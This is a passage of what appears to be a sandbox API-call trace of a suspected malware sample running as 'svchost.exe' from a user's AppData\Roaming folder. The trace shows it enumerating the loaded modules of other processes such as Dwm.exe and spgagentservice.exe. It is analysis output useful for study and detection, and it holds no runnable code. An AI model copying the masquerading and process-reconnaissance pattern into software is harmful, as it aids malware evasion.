0xd956b0 [0072.131] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0072.132] CoTaskMemFree (pv=0xd956b0) [0072.132] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.132] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0072.133] CoTaskMemFree (pv=0xd956b0) [0072.133] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x23f2560, cb=0x18 | out: lpmodinfo=0x23f2560*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0072.134] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.134] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0072.135] CoTaskMemFree (pv=0xd956b0) [0072.135] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.135] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0072.140] CoTaskMemFree (pv=0xd956b0) [0072.140] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x23f47c8, cb=0x18 | out: lpmodinfo=0x23f47c8*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0072.141] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.141] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0072.142] CoTaskMemFree (pv=0xd956b0) [0072.142] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.142] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0072.143] CoTaskMemFree (pv=0xd956b0) [0072.143] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x23f6990, cb=0x18 | out: lpmodinfo=0x23f6990*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0072.144] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.144] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0072.145] CoTaskMemFree (pv=0xd956b0) [0072.145] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.145] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0072.146] CoTaskMemFree (pv=0xd956b0) [0072.146] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x23f8b50, cb=0x18 | out: lpmodinfo=0x23f8b50*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0072.147] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.147] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0072.149] CoTaskMemFree (pv=0xd956b0) [0072.149] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.149] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0072.150] CoTaskMemFree (pv=0xd956b0) [0072.150] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd790000, lpmodinfo=0x23fad10, cb=0x18 | out: lpmodinfo=0x23fad10*(lpBaseOfDll=0x7fefd790000, SizeOfImage=0xc000, EntryPoint=0x7fefd793e50)) returned 1 [0072.151] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.151] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd790000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="sxssrv.DLL") returned 0xa [0072.152] CoTaskMemFree (pv=0xd956b0) [0072.152] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.152] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd790000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sxssrv.DLL" (normalized: "c:\\windows\\system32\\sxssrv.dll")) returned 0x1e [0072.155] CoTaskMemFree (pv=0xd956b0) [0072.155] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd680000, lpmodinfo=0x23fced0, cb=0x18 | out: lpmodinfo=0x23fced0*(lpBaseOfDll=0x7fefd680000, SizeOfImage=0x91000, EntryPoint=0x7fefd681440)) returned 1 [0072.156] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.156] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd680000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="sxs.dll") returned 0x7 [0072.157] CoTaskMemFree (pv=0xd956b0) [0072.157] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.157] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd680000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")) returned 0x1b [0072.159] CoTaskMemFree (pv=0xd956b0) [0072.159] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefdb50000, lpmodinfo=0x23ff080, cb=0x18 | out: lpmodinfo=0x23ff080*(lpBaseOfDll=0x7fefdb50000, SizeOfImage=0x12d000, EntryPoint=0x7fefdb9ed50)) returned 1 [0072.160] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.160] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefdb50000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0072.161] CoTaskMemFree (pv=0xd956b0) [0072.162] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.162] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefdb50000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\RPCRT4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")) returned 0x1e [0072.163] CoTaskMemFree (pv=0xd956b0) [0072.163] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd670000, lpmodinfo=0x2401240, cb=0x18 | out: lpmodinfo=0x2401240*(lpBaseOfDll=0x7fefd670000, SizeOfImage=0xf000, EntryPoint=0x7fefd671010)) returned 1 [0072.164] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.164] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd670000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0072.166] CoTaskMemFree (pv=0xd956b0) [0072.166] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.166] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd670000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPTBASE.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")) returned 0x21 [0072.167] CoTaskMemFree (pv=0xd956b0) [0072.167] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x2403410, cb=0x18 | out: lpmodinfo=0x2403410*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0072.169] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.169] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0072.170] CoTaskMemFree (pv=0xd956b0) [0072.171] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.171] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ADVAPI32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0072.172] CoTaskMemFree (pv=0xd956b0) [0072.172] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefee80000, lpmodinfo=0x24056f8, cb=0x18 | out: lpmodinfo=0x24056f8*(lpBaseOfDll=0x7fefee80000, SizeOfImage=0x1f000, EntryPoint=0x7fefee860e8)) returned 1 [0072.173] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.173] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefee80000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0072.175] CoTaskMemFree (pv=0xd956b0) [0072.175] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.175] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefee80000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")) returned 0x1f [0072.177] CoTaskMemFree (pv=0xd956b0) [0072.177] CloseHandle (hObject=0x214) returned 1 [0072.180] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0072.180] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x214 [0072.180] EnumProcessModules (in: hProcess=0x214, lphModule=0x2408228, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2408228, lpcbNeeded=0x23ee40) returned 1 [0072.181] GetModuleInformation (in: hProcess=0x214, hModule=0xbd0000, lpmodinfo=0x2408498, cb=0x18 | out: lpmodinfo=0x2408498*(lpBaseOfDll=0xbd0000, SizeOfImage=0x17000, EntryPoint=0xbd14a1)) returned 1 [0072.181] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.181] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xbd0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="spgagentservice.exe") returned 0x13 [0072.182] CoTaskMemFree (pv=0xd956b0) [0072.182] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.182] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xbd0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Program Files\\Windows Journal\\spgagentservice.exe" (normalized: "c:\\program files\\windows journal\\spgagentservice.exe")) returned 0x34 [0072.182] CoTaskMemFree (pv=0xd956b0) [0072.182] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x240a6d0, cb=0x18 | out: lpmodinfo=0x240a6d0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0072.183] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.183] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0072.183] CoTaskMemFree (pv=0xd956b0) [0072.184] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.184] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0072.189] CoTaskMemFree (pv=0xd956b0) [0072.189] GetModuleInformation (in: hProcess=0x214, hModule=0x75300000, lpmodinfo=0x240c890, cb=0x18 | out: lpmodinfo=0x240c890*(lpBaseOfDll=0x75300000, SizeOfImage=0x3f000, EntryPoint=0x7532e088)) returned 1 [0072.189] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.189] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75300000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64.dll") returned 0x9 [0072.190] CoTaskMemFree (pv=0xd956b0) [0072.190] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.190] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75300000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")) returned 0x1d [0072.191] CoTaskMemFree (pv=0xd956b0) [0072.191] GetModuleInformation (in: hProcess=0x214, hModule=0x752a0000, lpmodinfo=0x240ea68, cb=0x18 | out: lpmodinfo=0x240ea68*(lpBaseOfDll=0x752a0000, SizeOfImage=0x5c000, EntryPoint=0x752df9f4)) returned 1 [0072.191] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.191] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x752a0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64win.dll") returned 0xc [0072.192] CoTaskMemFree (pv=0xd956b0) [0072.192] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.192] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x752a0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")) returned 0x20 [0072.193] CoTaskMemFree (pv=0xd956b0) [0072.193] GetModuleInformation (in: hProcess=0x214, hModule=0x75290000, lpmodinfo=0x2410c38, cb=0x18 | out: lpmodinfo=0x2410c38*(lpBaseOfDll=0x75290000, SizeOfImage=0x8000, EntryPoint=0x752920f8)) returned 1 [0072.193] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.193] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x75290000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="wow64cpu.dll") returned 0xc [0072.194] CoTaskMemFree (pv=0xd956b0) [0072.194] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.194] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x75290000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")) returned 0x20 [0072.195] CoTaskMemFree (pv=0xd956b0) [0072.195] CloseHandle (hObject=0x214) returned 1 [0072.196] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", nBufferLength=0x105, lpBuffer=0x23e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\svchost.exe", lpFilePart=0x0) returned 0x2e [0072.196] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a0) returned 0x214 [0072.196] EnumProcessModules (in: hProcess=0x214, lphModule=0x2413358, cb=0x200, lpcbNeeded=0x23ee40 | out: lphModule=0x2413358, lpcbNeeded=0x23ee40) returned 1 [0072.199] GetModuleInformation (in: hProcess=0x214, hModule=0xffc70000, lpmodinfo=0x24135c8, cb=0x18 | out: lpmodinfo=0x24135c8*(lpBaseOfDll=0xffc70000, SizeOfImage=0x23000, EntryPoint=0xffc749d4)) returned 1 [0072.199] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.199] GetModuleBaseNameW (in: hProcess=0x214, hModule=0xffc70000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="Dwm.exe") returned 0x7 [0072.200] CoTaskMemFree (pv=0xd956b0) [0072.200] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.201] GetModuleFileNameExW (in: hProcess=0x214, hModule=0xffc70000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\Dwm.exe" (normalized: "c:\\windows\\system32\\dwm.exe")) returned 0x1b [0072.201] CoTaskMemFree (pv=0xd956b0) [0072.201] GetModuleInformation (in: hProcess=0x214, hModule=0x77830000, lpmodinfo=0x24157b0, cb=0x18 | out: lpmodinfo=0x24157b0*(lpBaseOfDll=0x77830000, SizeOfImage=0x1a9000, EntryPoint=0x0)) returned 1 [0072.201] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.201] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77830000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0072.202] CoTaskMemFree (pv=0xd956b0) [0072.202] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.202] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77830000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0072.203] CoTaskMemFree (pv=0xd956b0) [0072.203] GetModuleInformation (in: hProcess=0x214, hModule=0x77710000, lpmodinfo=0x2417970, cb=0x18 | out: lpmodinfo=0x2417970*(lpBaseOfDll=0x77710000, SizeOfImage=0x11f000, EntryPoint=0x77725340)) returned 1 [0072.203] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.203] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77710000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="kernel32.dll") returned 0xc [0072.204] CoTaskMemFree (pv=0xd956b0) [0072.204] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.204] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77710000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0072.205] CoTaskMemFree (pv=0xd956b0) [0072.205] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefd910000, lpmodinfo=0x2419b40, cb=0x18 | out: lpmodinfo=0x2419b40*(lpBaseOfDll=0x7fefd910000, SizeOfImage=0x6c000, EntryPoint=0x7fefd912780)) returned 1 [0072.205] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.205] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefd910000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="KERNELBASE.dll") returned 0xe [0072.206] CoTaskMemFree (pv=0xd956b0) [0072.206] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.206] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefd910000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\KERNELBASE.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")) returned 0x22 [0072.207] CoTaskMemFree (pv=0xd956b0) [0072.207] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff1c0000, lpmodinfo=0x241bd10, cb=0x18 | out: lpmodinfo=0x241bd10*(lpBaseOfDll=0x7feff1c0000, SizeOfImage=0x67000, EntryPoint=0x7feff1cb03c)) returned 1 [0072.207] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.207] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff1c0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0072.208] CoTaskMemFree (pv=0xd956b0) [0072.208] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.208] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff1c0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\GDI32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")) returned 0x1d [0072.209] CoTaskMemFree (pv=0xd956b0) [0072.209] GetModuleInformation (in: hProcess=0x214, hModule=0x77610000, lpmodinfo=0x241df28, cb=0x18 | out: lpmodinfo=0x241df28*(lpBaseOfDll=0x77610000, SizeOfImage=0xfa000, EntryPoint=0x7762a2c8)) returned 1 [0072.209] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.209] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x77610000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0072.210] CoTaskMemFree (pv=0xd956b0) [0072.210] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.210] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x77610000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0072.211] CoTaskMemFree (pv=0xd956b0) [0072.211] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff350000, lpmodinfo=0x24200e8, cb=0x18 | out: lpmodinfo=0x24200e8*(lpBaseOfDll=0x7feff350000, SizeOfImage=0xe000, EntryPoint=0x7feff351080)) returned 1 [0072.212] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.212] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff350000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="LPK.dll") returned 0x7 [0072.213] CoTaskMemFree (pv=0xd956b0) [0072.213] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.213] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff350000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\LPK.dll" (normalized: "c:\\windows\\system32\\lpk.dll")) returned 0x1b [0072.214] CoTaskMemFree (pv=0xd956b0) [0072.214] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff690000, lpmodinfo=0x2422298, cb=0x18 | out: lpmodinfo=0x2422298*(lpBaseOfDll=0x7feff690000, SizeOfImage=0xc9000, EntryPoint=0x7feff70a874)) returned 1 [0072.215] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.215] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff690000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="USP10.dll") returned 0x9 [0072.216] CoTaskMemFree (pv=0xd956b0) [0072.216] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.216] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff690000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\USP10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")) returned 0x1d [0072.217] CoTaskMemFree (pv=0xd956b0) [0072.217] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff100000, lpmodinfo=0x2424458, cb=0x18 | out: lpmodinfo=0x2424458*(lpBaseOfDll=0x7feff100000, SizeOfImage=0x9f000, EntryPoint=0x7feff1025a0)) returned 1 [0072.218] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.218] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff100000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0072.219] CoTaskMemFree (pv=0xd956b0) [0072.219] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.219] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff100000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")) returned 0x1e [0072.220] CoTaskMemFree (pv=0xd956b0) [0072.220] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefc0d0000, lpmodinfo=0x24266b0, cb=0x18 | out: lpmodinfo=0x24266b0*(lpBaseOfDll=0x7fefc0d0000, SizeOfImage=0x56000, EntryPoint=0x7fefc0dbbc0)) returned 1 [0072.221] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.221] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefc0d0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="UxTheme.dll") returned 0xb [0072.222] CoTaskMemFree (pv=0xd956b0) [0072.222] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.222] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefc0d0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\UxTheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")) returned 0x1f [0072.223] CoTaskMemFree (pv=0xd956b0) [0072.223] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff400000, lpmodinfo=0x2428870, cb=0x18 | out: lpmodinfo=0x2428870*(lpBaseOfDll=0x7feff400000, SizeOfImage=0x2e000, EntryPoint=0x7feff401010)) returned 1 [0072.224] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.224] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff400000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="IMM32.dll") returned 0x9 [0072.225] CoTaskMemFree (pv=0xd956b0) [0072.225] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.225] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff400000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\IMM32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")) returned 0x1d [0072.226] CoTaskMemFree (pv=0xd956b0) [0072.226] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff9d0000, lpmodinfo=0x242aa48, cb=0x18 | out: lpmodinfo=0x242aa48*(lpBaseOfDll=0x7feff9d0000, SizeOfImage=0x109000, EntryPoint=0x7feff9d1064)) returned 1 [0072.227] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.227] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff9d0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="MSCTF.dll") returned 0x9 [0072.229] CoTaskMemFree (pv=0xd956b0) [0072.229] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.229] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff9d0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSCTF.dll" (normalized: "c:\\windows\\system32\\msctf.dll")) returned 0x1d [0072.230] CoTaskMemFree (pv=0xd956b0) [0072.230] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefb0a0000, lpmodinfo=0x242cc08, cb=0x18 | out: lpmodinfo=0x242cc08*(lpBaseOfDll=0x7fefb0a0000, SizeOfImage=0x27000, EntryPoint=0x7fefb0a7254)) returned 1 [0072.232] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.232] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefb0a0000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="dwmredir.dll") returned 0xc [0072.233] CoTaskMemFree (pv=0xd956b0) [0072.233] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.233] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefb0a0000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmredir.dll" (normalized: "c:\\windows\\system32\\dwmredir.dll")) returned 0x20 [0072.234] CoTaskMemFree (pv=0xd956b0) [0072.234] GetModuleInformation (in: hProcess=0x214, hModule=0x7fefaf00000, lpmodinfo=0x242edd8, cb=0x18 | out: lpmodinfo=0x242edd8*(lpBaseOfDll=0x7fefaf00000, SizeOfImage=0x192000, EntryPoint=0x7fefaf5700c)) returned 1 [0072.235] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.235] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7fefaf00000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="dwmcore.dll") returned 0xb [0072.237] CoTaskMemFree (pv=0xd956b0) [0072.237] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.237] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7fefaf00000, lpFilename=0xd956b0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmcore.dll" (normalized: "c:\\windows\\system32\\dwmcore.dll")) returned 0x1f [0072.238] CoTaskMemFree (pv=0xd956b0) [0072.238] GetModuleInformation (in: hProcess=0x214, hModule=0x7feff430000, lpmodinfo=0x2430f98, cb=0x18 | out: lpmodinfo=0x2430f98*(lpBaseOfDll=0x7feff430000, SizeOfImage=0xdb000, EntryPoint=0x7feff450760)) returned 1 [0072.239] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.239] GetModuleBaseNameW (in: hProcess=0x214, hModule=0x7feff430000, lpBaseName=0xd956b0, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0072.241] CoTaskMemFree (pv=0xd956b0) [0072.241] CoTaskMemAlloc (cb=0x804) returned 0xd956b0 [0072.241] GetModuleFileNameExW (in: hProcess=0x214, hModule=0x7feff430000, 